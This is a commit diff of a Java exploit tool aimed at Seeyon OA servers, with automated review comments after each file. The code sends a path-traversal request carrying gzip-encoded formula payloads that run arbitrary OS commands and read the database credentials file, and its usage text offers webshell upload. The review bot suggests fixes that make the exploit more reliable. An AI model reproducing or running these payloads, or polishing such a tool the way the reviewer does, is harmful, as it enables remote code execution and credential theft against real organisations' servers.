Showing
14 changed files
with
492 additions
and
0 deletions.
@@ -0,0 +1,39 @@ | ||
<?xml version="1.0" encoding="UTF-8"?> | ||
<project xmlns="http://maven.apache.org/POM/4.0.0" | ||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | ||
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> | ||
<modelVersion>4.0.0</modelVersion> | ||
|
||
<groupId>groupId</groupId> | ||
<artifactId>Seeyon</artifactId> | ||
<version>1.0-SNAPSHOT</version> | ||
<build> | ||
<plugins> | ||
<plugin> | ||
<groupId>org.apache.maven.plugins</groupId> | ||
<artifactId>maven-compiler-plugin</artifactId> | ||
<configuration> | ||
<source>7</source> | ||
<target>7</target> | ||
</configuration> | ||
</plugin> | ||
</plugins> | ||
</build> | ||
<dependencies> | ||
<dependency> | ||
<groupId>commons-codec</groupId> | ||
<artifactId>commons-codec</artifactId> | ||
<version>1.15</version> | ||
</dependency> | ||
<dependency> | ||
<groupId>org.apache.httpcomponents</groupId> | ||
<artifactId>httpclient</artifactId> | ||
<version>4.5.13</version> | ||
</dependency> | ||
<dependency> | ||
<groupId>org.json</groupId> | ||
<artifactId>json</artifactId> | ||
<version>20180813</version> | ||
</dependency> | ||
</dependencies> | ||
</project> |
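Review bot: The compiler plugin pins source/target 7 while the Java sources in this commit import `sun.misc.BASE64Encoder`/`BASE64Decoder`, classes that were removed from the JDK in 9, so the build presumably only succeeds on a JDK 8-or-older toolchain and nothing in the POM says so; a comment on the `<configuration>` block such as `<!-- build with JDK <= 8: sources depend on sun.misc.BASE64* -->` would save the next person a confusing compile failure. No shade/assembly plugin is declared, so the `Main-Class` manifest added in this commit will only run when the three dependencies are placed on the classpath by hand. `org.json` is pinned to a 2018 build; it appears to parse only the local `vul.json` here, but if the tool ever reads attacker-influenced JSON it is worth moving to a current release.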
@@ -0,0 +1,3 @@ | ||
Manifest-Version: 1.0 | ||
Main-Class: ExpMain | ||
|
@@ -0,0 +1,33 @@ | ||
import java.util.UUID; | ||
|
||
public class DataConf { | ||
public void DataConf(String oaUrl) throws Exception { | ||
HTTPClient httpClient = new HTTPClient(); | ||
String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"; | ||
UUID uuid = UUID.randomUUID(); | ||
String uuidStr = uuid.toString(); | ||
uuidStr = uuidStr.replace("-", ""); | ||
String getUrl = oaUrl + "/" + uuidStr + ".txt"; | ||
String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt"; | ||
String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt"; | ||
String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt"; | ||
String winReadDadaConf = "cd ../../base/conf & type datasourceCtp.properties"; | ||
String linReadDadaConf = "cat ../../base/conf/datasourceCtp.properties"; | ||
String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + winReadDadaConf + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + linReadDadaConf + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();System.out.println(sbStr);sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = \"\";for (int i=0;i<enChar.length;i++){ int intCh = (int)enChar[i]+1;Base65 = Base65 + Integer.toHexString(intCh); };java.io.FileWriter writer = new java.io.FileWriter(\""+uuidTxt+"\");writer.write(Base65);writer.flush();writer.close();};test();def static xxx(){'},'',{},'true']"; | ||
String execUrl = new Encoder().Encoder(execString); | ||
String execExp = "managerMethod=validate&arguments=" + execUrl; | ||
//删除回显文件payload | ||
//java文件删除无法删除文件,应该是权限不够 | ||
//String delString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'java.io.File file=new java.io.File(\""+uuidTxt+"\");file.delete();};test();def static xxx(){'},'',{},'true']"; | ||
String delString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\""+winDel+"\");Process process = pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\""+linuxDel+"\");Process process = pb.start();}};test();def static xxx(){'},'',{},'true']"; | ||
String expDelUrl = new Encoder().Encoder(delString); | ||
String expDel = "managerMethod=validate&arguments=" + expDelUrl; | ||
System.out.println(execExp); | ||
//执行的顺序为,写入回显文件,得到回显文件内容,删除回显文件 | ||
httpClient.sendPost(realUrl,execExp); | ||
Thread.sleep(2 * 1000); | ||
httpClient.getRes(getUrl); | ||
Thread.sleep(2 * 1000); | ||
httpClient.doDel(getUrl,expDel); | ||
} | ||
} |
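Review bot: The cleanup request on the last statement of the method is posted to `getUrl` (the `<uuid>.txt` echo file) instead of the `ajax.do` endpoint held in `realUrl`, so the delete payload never reaches the formula evaluator and the file containing the contents of `datasourceCtp.properties` — database credentials — is left in the target's web root. `ExecuteCode` in the same commit posts its delete to the endpoint; this method should match it: `httpClient.doDel(realUrl, expDel);`. The response of the initial `sendPost` is never inspected before the fixed sleep, so a rejected payload still leads to fetching and decoding whatever page the GET returns. The method is named like a constructor but declares `void`, which is why callers have to write `new DataConf().DataConf(url)`; a verb name such as `readDataConf` would make the call site clearer.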
@@ -0,0 +1,20 @@ | ||
import java.io.ByteArrayInputStream; | ||
import java.io.ByteArrayOutputStream; | ||
import java.io.IOException; | ||
import java.net.URLDecoder; | ||
import java.util.zip.GZIPInputStream; | ||
|
||
public class Decoder { | ||
public String Decoder(String decodeStr) throws IOException { | ||
ByteArrayOutputStream byteOut = new ByteArrayOutputStream(); | ||
decodeStr = URLDecoder.decode(decodeStr,"UTF-8"); | ||
ByteArrayInputStream byteIn = new ByteArrayInputStream(decodeStr.getBytes("iso-8859-1")); | ||
GZIPInputStream gzipInput = new GZIPInputStream(byteIn); | ||
byte[] buffer = new byte[1024]; | ||
int n; | ||
while ((n=gzipInput.read(buffer))>=0){ | ||
byteOut.write(buffer,0,n); | ||
} | ||
return byteOut.toString(); | ||
} | ||
} |
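Review bot: `byteOut.toString()` on the return line uses the platform default charset, while `Encoder` in this commit compresses the UTF-8 bytes of the input, so on a non-UTF-8 JVM (the GBK handling elsewhere in this commit suggests Windows consoles are expected) any non-ASCII payload text decodes garbled; use `return byteOut.toString("UTF-8");`. `gzipInput` is never closed; since the declared target is Java 7, wrap it as `try (GZIPInputStream gzipInput = new GZIPInputStream(byteIn)) { ... }`. The ISO-8859-1 step deserves a one-line comment — it is the only charset that maps each URL-decoded char back to exactly one byte, which is what makes the gzip bytes survive the String detour.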
@@ -0,0 +1,17 @@ | ||
import java.io.ByteArrayOutputStream; | ||
import java.io.IOException; | ||
import java.net.URLEncoder; | ||
import java.util.zip.GZIPOutputStream; | ||
|
||
public class Encoder { | ||
|
||
public String Encoder(String encodeStr) throws IOException { | ||
ByteArrayOutputStream byteOut = new ByteArrayOutputStream(); | ||
GZIPOutputStream gzipOut = new GZIPOutputStream(byteOut); | ||
gzipOut.write(encodeStr.getBytes("UTF-8")); | ||
gzipOut.close(); | ||
gzipOut.flush(); | ||
String gzipEnStr = byteOut.toString("iso-8859-1"); | ||
return URLEncoder.encode(gzipEnStr,"UTF-8"); | ||
} | ||
} |
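Review bot: `gzipOut.flush()` is called after `gzipOut.close()`, so it runs on an already-closed stream; either flush before close or rely on `close()` alone, which finishes the deflater and writes the gzip trailer. Try-with-resources keeps the order right and releases the deflater on the exception path: `try (GZIPOutputStream gzipOut = new GZIPOutputStream(byteOut)) { gzipOut.write(encodeStr.getBytes("UTF-8")); }`. The `toString("iso-8859-1")` step is load-bearing and should be commented: it maps every compressed byte to one char, after which `URLEncoder.encode(..., "UTF-8")` expands each byte >= 0x80 into a two-byte percent sequence that the receiving side must undo the same way (the `Decoder` in this commit does).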
@@ -0,0 +1,31 @@ | ||
import java.util.UUID; | ||
|
||
public class ExecuteCode { | ||
public void ExecuteCode(String oaUrl,String cmd) throws Exception { | ||
HTTPClient httpClient = new HTTPClient(); | ||
UUID uuid = UUID.randomUUID(); | ||
String uuidStr = uuid.toString(); | ||
uuidStr = uuidStr.replace("-", ""); | ||
String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"; | ||
String getUrl = oaUrl + "/" + uuidStr + ".txt"; | ||
String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt"; | ||
String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt"; | ||
String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt"; | ||
//执行命令 | ||
String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + cmd + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + cmd + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = \"\";for (int i=0;i<enChar.length;i++){ int intCh = (int)enChar[i]+1;Base65 = Base65 + Integer.toHexString(intCh); };java.io.FileWriter writer = new java.io.FileWriter(\""+uuidTxt+"\");writer.write(Base65);writer.flush();writer.close();};test();def static xxx(){'},'',{},'true']"; | ||
System.out.println(execString); | ||
String execUrl = new Encoder().Encoder(execString); | ||
String execExp = "managerMethod=validate&arguments=" + execUrl; | ||
System.out.println(execExp); | ||
//删除命令回显文件 | ||
String delString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\""+winDel+"\");Process process = pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\""+linuxDel+"\");Process process = pb.start();}};test();def static xxx(){'},'',{},'true']"; | ||
String execDel = new Encoder().Encoder(delString); | ||
execDel = "managerMethod=validate&arguments=" + execDel; | ||
|
||
httpClient.sendPost(realUrl,execExp); | ||
Thread.sleep(2 * 1000); | ||
httpClient.getRes(getUrl); | ||
Thread.sleep(2 * 1000); | ||
httpClient.doDel(realUrl,execDel); | ||
} | ||
} |
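Review bot: `cmd` is spliced verbatim into the double-quoted Java string inside `execString` (`\"" + cmd + "\"`), so a command containing `"`, `'` or `\` breaks the expression and the failure surfaces only as a server-side parse error that this method never checks for; at minimum reject those characters before building the payload, e.g. `if (cmd.matches(".*[\"'\\\\].*")) throw new IllegalArgumentException("cmd must not contain quotes or backslashes");`. Inside the payload `Integer.toHexString(intCh)` emits a single digit for values below 0x10 — in particular the 0x0B produced from a `\n` line separator in `BASE64Encoder` output — which shifts every later two-character pair that `HTTPClient.decode` expects, so long outputs from targets whose line separator is `\n` presumably come back garbled; a zero-padded form such as `String.format("%02x", intCh)`, if the formula evaluator permits it, keeps the pairs aligned. The response of the first `sendPost` is discarded before the fixed two-second sleep, so a rejected payload still proceeds to the GET and the delete.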
@@ -0,0 +1,34 @@ | ||
public class ExpMain { | ||
public static void main(String args[]) throws Exception { | ||
if (args.length == 2 && !args[1].equals("dataConf") && !args[0].equals("scan") && !args[0].equals("encode") && !args[0].equals("decode")) { | ||
System.out.println("[*]正在执行......, 漏洞影响版本:V7.1、V8.0"); | ||
new ExecuteCode().ExecuteCode(args[0],args[1]); | ||
} else if (args.length == 2 && args[1].equals("dataConf")) { | ||
System.out.println("[*]正在执行......, 漏洞影响版本:V7.1、V8.0"); | ||
new DataConf().DataConf(args[0]); | ||
} else if (args.length == 4 && args[1].equals("shell")) { | ||
System.out.println("[*]正在执行......, 漏洞影响版本:V7.1、V8.0"); | ||
new UploadShell().UploadShell(args[0],args[2],args[3]); | ||
} else if (args.length == 2 && args[0].equals("scan")){ | ||
System.out.println("[*]正在执行......, 漏洞影响版本:V7.1、V8.0"); | ||
if (args[1].contains("http:") || args[1].contains("https:")){ | ||
VersionRecognition versionRecognition = new VersionRecognition(); | ||
versionRecognition.VersionRecognition(args[1]); | ||
} | ||
}else if (args.length == 2 && args[0].equals("encode")){ | ||
System.out.println("ciphertext:\n" +new Encoder().Encoder(args[1])); | ||
}else if (args.length == 2 && args[0].equals("decode")){ | ||
System.out.println("Plaintext:\n" +new Decoder().Decoder(args[1])); | ||
}else { | ||
System.out.println("[*]使用说明:\n" + | ||
"[*]无损检验是否存在漏洞:scan http/https://xxxx.com:port/seeyon \n"+ | ||
"[*]执行命令:http/https://xxxx.com:port/seeyon cmd\n" + | ||
"[*]写入shell:http/https://xxxx.com:port/seeyon shell srcFile desFile,第三个参数为本地的shell文件,第四个参数为写入服务器的文件名\n" + | ||
"[*]读取数据库配置文件:http/https://xxxx.com:port/seeyon dataConf\n" + | ||
"[*]流量解码:decode ciphertext\n"+ | ||
"[*]流量编码:encode Plaintext\n"); | ||
System.exit(0); | ||
} | ||
} | ||
} | ||
|
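Review bot: The first branch fires for any two arguments whose first word is not one of the four keywords, so a mistyped verb (`scann <url>`) is interpreted as `<url> <cmd>` and an exploit attempt is launched with the typo as the target; the exploit branches should require the same scheme check the `scan` branch already applies, e.g. `if (!args[0].startsWith("http://") && !args[0].startsWith("https://")) { /* print usage */ System.exit(1); }`. In the `scan` branch a target that fails the `http:`/`https:` test prints the "executing" banner and then silently does nothing; fall through to the usage text instead. `UploadShell` and `VersionRecognition` are referenced here but not visible on this page, so the `shell` and `scan` paths could not be reviewed end to end.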
@@ -0,0 +1,108 @@ | ||
import org.apache.http.HttpResponse; | ||
import org.apache.http.client.HttpClient; | ||
import org.apache.http.client.methods.CloseableHttpResponse; | ||
import org.apache.http.client.methods.HttpGet; | ||
import org.apache.http.client.methods.HttpPost; | ||
import org.apache.http.client.utils.URIBuilder; | ||
import org.apache.http.entity.StringEntity; | ||
import org.apache.http.impl.client.CloseableHttpClient; | ||
import org.apache.http.impl.client.DefaultHttpClient; | ||
import org.apache.http.util.EntityUtils; | ||
import sun.misc.BASE64Decoder; | ||
|
||
import java.io.IOException; | ||
|
||
public class HTTPClient { | ||
public String sendPost(String url, String param) throws Exception { | ||
if(url.startsWith("http:")){ | ||
HttpPost httpPost = new HttpPost(url); | ||
StringEntity stringEntity = new StringEntity(param); | ||
stringEntity.setContentType("application/x-www-form-urlencoded"); | ||
//httpPost.setHeader("Connection","close"); | ||
httpPost.setEntity(stringEntity); | ||
HttpResponse response = new DefaultHttpClient().execute(httpPost); | ||
String result = EntityUtils.toString(response.getEntity()); | ||
System.out.println(result); | ||
return result; | ||
}else{ | ||
CloseableHttpClient client = new SSLClient(); | ||
URIBuilder uriBuilder = new URIBuilder(url); | ||
HttpPost httpPost = new HttpPost(uriBuilder.build()); | ||
StringEntity stringEntity = new StringEntity(param); | ||
stringEntity.setContentType("application/x-www-form-urlencoded"); | ||
//httpPost.setHeader("Connection","close"); | ||
httpPost.setEntity(stringEntity); | ||
CloseableHttpResponse response = client.execute(httpPost); | ||
String result = EntityUtils.toString(response.getEntity()); | ||
System.out.println(result); | ||
return result; | ||
} | ||
} | ||
//http与https 得到回显内容 | ||
public String getRes(String url) throws Exception { | ||
String result; | ||
if (url.startsWith("http:")){ | ||
HttpClient client = new DefaultHttpClient(); | ||
HttpGet request = new HttpGet(url); | ||
//request.setHeader("Connection","close"); | ||
HttpResponse response = client.execute(request); | ||
result = EntityUtils.toString(response.getEntity()); | ||
if (result != null){ | ||
result = decode(result); | ||
System.out.println(result); | ||
} | ||
}else { | ||
CloseableHttpClient client = new SSLClient(); | ||
URIBuilder uriBuilder = new URIBuilder(url); | ||
HttpGet httpGet = new HttpGet(uriBuilder.build()); | ||
CloseableHttpResponse response = client.execute(httpGet); | ||
result = EntityUtils.toString(response.getEntity()); | ||
if (result != null) { | ||
result = decode(result); | ||
System.out.println(result); | ||
} | ||
} | ||
return result; | ||
} | ||
//测试是否有 | ||
//http与https 删除回显输出文件 | ||
public void doDel(String url,String param) throws Exception { | ||
if (url.startsWith("http:")){ | ||
HttpPost httpPost = new HttpPost(url); | ||
httpPost.setHeader("Connection","close"); | ||
StringEntity stringEntity = new StringEntity(param); | ||
stringEntity.setContentType("application/x-www-form-urlencoded"); | ||
httpPost.setEntity(stringEntity); | ||
HttpClient client = new DefaultHttpClient(); | ||
HttpResponse response = new DefaultHttpClient().execute(httpPost); | ||
if (response != null){ | ||
System.out.println("[*]命令执行完毕"); | ||
} | ||
}else { | ||
CloseableHttpClient client = new SSLClient(); | ||
URIBuilder uriBuilder = new URIBuilder(url); | ||
HttpPost httpPost = new HttpPost(uriBuilder.build()); | ||
httpPost.setHeader("Connection","close"); | ||
StringEntity stringEntity = new StringEntity(param); | ||
stringEntity.setContentType("application/x-www-form-urlencoded"); | ||
httpPost.setEntity(stringEntity); | ||
CloseableHttpResponse response = client.execute(httpPost); | ||
if (response !=null){ | ||
System.out.println("[*]命令执行完毕"); | ||
} | ||
} | ||
} | ||
//BASE65解码模块 | ||
public String decode(String string) throws IOException { | ||
BASE64Decoder decoder = new BASE64Decoder(); | ||
String deStr = ""; | ||
for(int i=0;i<string.length();i=i+2){ | ||
String str2 = string.substring(i,i+2); | ||
char char2 = (char)(Integer.parseInt(str2,16)-1); | ||
deStr = deStr + char2; | ||
} | ||
deStr = deStr.replaceAll("ê",""); | ||
String realStr = new String(decoder.decodeBuffer(deStr),"UTF-8"); | ||
return realStr; | ||
} | ||
} |
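Review bot: `decode` assumes the response body is an even-length run of two-digit hex pairs, but the payloads in this commit build it with `Integer.toHexString(intCh)`, which emits a single digit for values under 0x10 — the `\n` that `sun.misc.BASE64Encoder` inserts between 76-character lines becomes 0x0B → `b` and misaligns every pair after it, while the `replaceAll("ê","")` only handles the `\r\n` case where the pair `eb` decodes to `ê`; outputs longer than 57 bytes are therefore presumably decodable only from targets whose line separator is `\r\n`. The padding fix belongs on the payload side, but `decode` should at least fail clearly instead of dying in `Integer.parseInt` when an HTML error page comes back: `if (string.length() % 2 != 0 || !string.matches("[0-9a-fA-F]*")) throw new IOException("response is not the expected hex stream: " + string);`. In `doDel` the `client` created on one line is discarded and a second `DefaultHttpClient` is built on the next, and no client or response anywhere in this class is closed or consumed; use `EntityUtils.consume` and close each `CloseableHttpClient`/response on every path.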
@@ -0,0 +1,24 @@ | ||
import java.io.*; | ||
import java.util.Iterator; | ||
|
||
import org.json.JSONArray; | ||
import org.json.JSONObject; | ||
|
||
public class JsonRead { | ||
|
||
public JSONObject JsonRead() throws IOException { | ||
String jsonString = ""; | ||
File jsonFile = new File("vul.json"); | ||
InputStreamReader reader = new InputStreamReader(new FileInputStream(jsonFile),"UTF-8"); | ||
String fileString = ""; | ||
BufferedReader bufferedReader = new BufferedReader(reader); | ||
while ((fileString = bufferedReader.readLine())!= null){ | ||
jsonString = jsonString + fileString; | ||
} | ||
JSONObject jsonObject = new JSONObject(jsonString); | ||
|
||
JSONArray jsonArray = new JSONArray(); | ||
jsonArray = jsonObject.getJSONArray("Vulnerabilities"); | ||
return jsonArray.getJSONObject(0); | ||
} | ||
} |
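Review bot: The `InputStreamReader`/`BufferedReader` over `vul.json` is never closed, and `jsonArray.getJSONObject(0)` throws an unhelpful `JSONException` when the `Vulnerabilities` array is empty; wrap the read in try-with-resources and check `jsonArray.length() > 0` before indexing. The `new JSONArray()` assigned and immediately overwritten is dead code. The path is resolved against the working directory, which is worth stating since the jar is launched via `Main-Class` from wherever the user happens to be: `// vul.json is looked up in the current working directory, not next to the jar`.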
@@ -0,0 +1,35 @@ | ||
import java.security.cert.CertificateException; | ||
import java.security.cert.X509Certificate; | ||
import javax.net.ssl.SSLContext; | ||
import javax.net.ssl.TrustManager; | ||
import javax.net.ssl.X509TrustManager; | ||
import org.apache.http.conn.ClientConnectionManager; | ||
import org.apache.http.conn.scheme.Scheme; | ||
import org.apache.http.conn.scheme.SchemeRegistry; | ||
import org.apache.http.conn.ssl.SSLSocketFactory; | ||
import org.apache.http.impl.client.DefaultHttpClient; | ||
|
||
public class SSLClient extends DefaultHttpClient { | ||
public SSLClient() throws Exception{ | ||
super(); | ||
SSLContext ctx = SSLContext.getInstance("TLS"); | ||
X509TrustManager tm = new X509TrustManager() { | ||
public void checkClientTrusted(X509Certificate[] chain, | ||
String authType) throws CertificateException { | ||
} | ||
@Override | ||
public void checkServerTrusted(X509Certificate[] chain, | ||
String authType) throws CertificateException { | ||
} | ||
@Override | ||
public X509Certificate[] getAcceptedIssuers() { | ||
return null; | ||
} | ||
}; | ||
ctx.init(null, new TrustManager[]{tm}, null); | ||
SSLSocketFactory ssf = new SSLSocketFactory(ctx,SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); | ||
ClientConnectionManager ccm = this.getConnectionManager(); | ||
SchemeRegistry sr = ccm.getSchemeRegistry(); | ||
sr.register(new Scheme("https", 443, ssf)); | ||
} | ||
} |
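Review bot: The `X509TrustManager` accepts every certificate and the socket factory is built with `ALLOW_ALL_HOSTNAME_VERIFIER`, so the HTTPS path verifies nothing — common for a tester pointing at self-signed targets, but it also means the payloads sent and the secrets read back (the database properties fetched by `DataConf` in this commit) can be intercepted by anyone on the path, and nothing in the class says so. Add a comment stating the trade-off, e.g. `// Deliberately trusts all certificates and hostnames (targets are typically self-signed); do not reuse this client outside the tool.`, and consider making it opt-in behind a flag. `getAcceptedIssuers()` returning `null` also violates the `X509TrustManager` contract; return `new X509Certificate[0]`, since some SSL engines dereference the array.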
@@ -0,0 +1,16 @@ | ||
public class Scanner{ | ||
public String Scanner(String poc,String url,String method,String res) throws Exception { | ||
HTTPClient httpClient = new HTTPClient(); | ||
String result = ""; | ||
if (method.toLowerCase().equals("post")) { | ||
result = httpClient.sendPost(url, poc); | ||
} else { | ||
result = httpClient.getRes(url); | ||
} | ||
if (result.contains(res)) { | ||
return url + "\n[!]:漏洞存在"; | ||
} else { | ||
return url + "[*]:漏洞不存在"; | ||
} | ||
} | ||
} |
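Review bot: The GET branch calls `httpClient.getRes(url)`, which in this commit runs the hex/Base64 `decode` over whatever body comes back, so scanning an ordinary page throws from `Integer.parseInt` instead of returning the body to compare against `res`; the scanner needs a plain-fetch path that returns the raw response. `poc` is ignored on the GET branch, and `method.toLowerCase()` has no `Locale`; `"post".equalsIgnoreCase(method)` covers both. The two result strings are inconsistent (`"\n[!]"` versus `"[*]"` with no separator), and naming the class `Scanner` shadows `java.util.Scanner` for any file that imports it.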